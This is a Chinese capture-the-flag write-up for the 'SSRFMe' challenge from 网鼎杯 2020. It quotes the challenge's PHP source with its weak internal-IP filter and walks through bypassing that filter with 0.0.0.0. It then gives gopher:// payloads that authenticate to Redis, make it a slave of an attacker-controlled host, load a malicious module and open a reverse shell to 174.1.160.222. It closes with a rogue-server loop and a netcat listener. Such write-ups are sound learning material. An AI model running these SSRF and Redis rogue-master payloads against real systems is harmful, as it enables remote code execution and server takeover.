[网鼎杯 2020 玄武组]SSRFMe

在BUU做的复现

function check_inner_ip($url)
{
    $match_result=preg_match('/^(http|https|gopher|dict)?:\/\/.*(\/)?.*$/',$url);
    if (!$match_result)
    {
        die('url fomat error');
    }
    try
    {
        $url_parse=parse_url($url);
    }
    catch(Exception $e)
    {
        die('url fomat error');
        return false;
    }
    $hostname=$url_parse['host'];
    $ip=gethostbyname($hostname);
    $int_ip=ip2long($ip);

    return ip2long('127.0.0 n.0')>>24 == $int_ip>>24 || ip2long('10.0.0.0')>>24 == $int_ip>>24 || ip2long('172.16.0.0')>>20 == $int_ip>>20 || ip2long('192.168.0.0')>>16 == $int_ip>>16;
}

function safe_request_url($url)
{

    if (check_inner_ip($url))
    {
        echo $url.' is inner ip';
    }
    else
    {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_HEADER, 0);
        $output = curl_exec($ch);
        $result_info = curl_getinfo($ch);
        if ($result_info['redirect_url'])
        {
            safe_request_url($result_info['redirect_url']);
        }
        curl_close($ch);
        var_dump($output);
    }

}
if(isset($_GET['url'])){
    $url = $_GET['url'];
    if(!empty($url)){
        safe_request_url($url);
    }
}
else{
    highlight_file(__FILE__);
}
// Please visit hint.php locally.
?>

https://blog.csdn.net/qq_39293438/article/details/84899550
这里面关于 curl 的利用提到了，当处理这个地址时

curl 和 php_url_parse 处理后最终的目标不一样

当 php_url_parse 认为 google.com 为目标的同时，curl 认为 evil.com:80 是目标。
也可以使用 DNS 重绑定（DNS rebinding）浅谈DNS重绑定漏洞
我用的是 ?url=http://0.0.0.0/hint.php //0.0.0.0 代表本机 ipv4 的所有地址

得到redis psss
用主从复制打 目录为有权限的/tmp

主从复制，是指将一台Redis服务器的数据，复制到其他的Redis服务器。前者称为主节点(master)，后者称为从节点(slave)；数据的复制是单向的，只能由主节点到从节点。
redis的持久化使得机器即使重启数据也不会丢失，因为redis服务器重启后会把硬盘上的文件重新恢复到内存中，但是如果硬盘的数据被删除的话数据就无法恢复了，如果通过主从复制就能解决这个问题，主redis的数据和从redis上的数据保持实时同步，当主redis写入数据是就会通过主从复制复制到其它从redis。

gopher://0.0.0.0:6379/_auth root
config set dir /tmp/
quit
//这里要二次url编码
gopher://0.0.0.0:6379/_auth%2520root%250aconfig%2520set%2520dir%2520%252ftmp%252f%250aquit

gopher://0.0.0.0:6379/_auth root
config set dbfilename exp.so
slaveof 174.1.160.222 6666
quit

gopher://0.0.0.0:6379/_auth root
module load /tmp/exp.so
system.rev 174.1.160.222 6663
quit

用rogue-server.py架起rogue 服务器，另外再监听6663端口。也就是说6666端口监听用来主从复制传输exp.so ,6663端口接收反弹shell。

rogue-server.py 来自https://github.com/xmsec/redis-ssrf （用这里的ssrf-redis.py是可以直接生成执行命令的payload，但buu的这我cat /flag一直打不出flag，whoami，pwd是有结果回显，很奇怪不知道啥原因）
exp.so 来自https://github.com/n0b0dyCN/redis-rogue-server

redis连接过后就这样，记得写个死循环跑rogue-server.py 不然一连上就自动断开连接。可能导致exp.so都没传完就中断了。

while [ "1" = "1" ]
do
	python rogue-server.py
done

再开个窗口nc -lvvp 6663监听就行

参考：

http://phoebe233.cn/index.php/archives/43/#images-22
https://guokeya.github.io/post/UwrwldTcP/
https://www.secpulse.com/archives/132215.html